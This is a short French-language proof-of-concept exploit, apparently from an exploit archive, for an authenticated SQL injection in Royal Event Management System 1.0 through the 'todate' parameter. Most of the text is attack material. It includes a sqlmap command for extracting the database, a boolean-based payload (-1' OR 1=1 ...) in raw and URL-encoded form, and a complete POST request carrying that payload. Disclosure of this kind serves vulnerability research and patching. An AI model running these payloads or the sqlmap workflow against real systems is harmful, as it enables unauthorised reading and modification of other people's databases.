
Injection SQL authentifiée pour Royal Event Management System 1.0 via le paramètre 'todate', avec des charges utiles de preuve de concept et l'intégration de SQLmap pour l'extraction de base de données.
Royal Event Management System 1.0 permet une injection SQL via le paramètre 'todate' dans /royal_event/btndates_report.php#?= L'exploitation de ce problème pourrait permettre à un attaquant de compromettre l'application, d'accéder ou de modifier des données, ou d'exploiter des vulnérabilités latentes dans la base de données sous-jacente.
Dans Burpsuite, interceptez la requête de la page affectée avec le paramètre 'todate' et enregistrez-la sous poc.txt. Ensuite, exécutez SQLmap pour extraire les données de la base de données :
sqlmap -r poc.txt --dbms=mysql
(boolean-based)
-1%27+OR+1%3d1+OR+%27ns%27%3d%27ns
POST /royal_event/btndates_report.php#?= HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 334
Content-Type: multipart/form-data; boundary=f289a6438bcc45179bcd3eb7ddc555d0
Cookie: PHPSESSID=qeoe141g7guakhacf152a3i380
Referer: http://localhost/royal_event/btndates_report.php#?=
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
--f289a6438bcc45179bcd3eb7ddc555d0
Content-Disposition: form-data; name="todate"
-1' OR 1=1 OR 'ns'='ns
--f289a6438bcc45179bcd3eb7ddc555d0
Content-Disposition: form-data; name="search"
3
--f289a6438bcc45179bcd3eb7ddc555d0
Content-Disposition: form-data; name="fromdate"
01/01/2011
--f289a6438bcc45179bcd3eb7ddc555d0--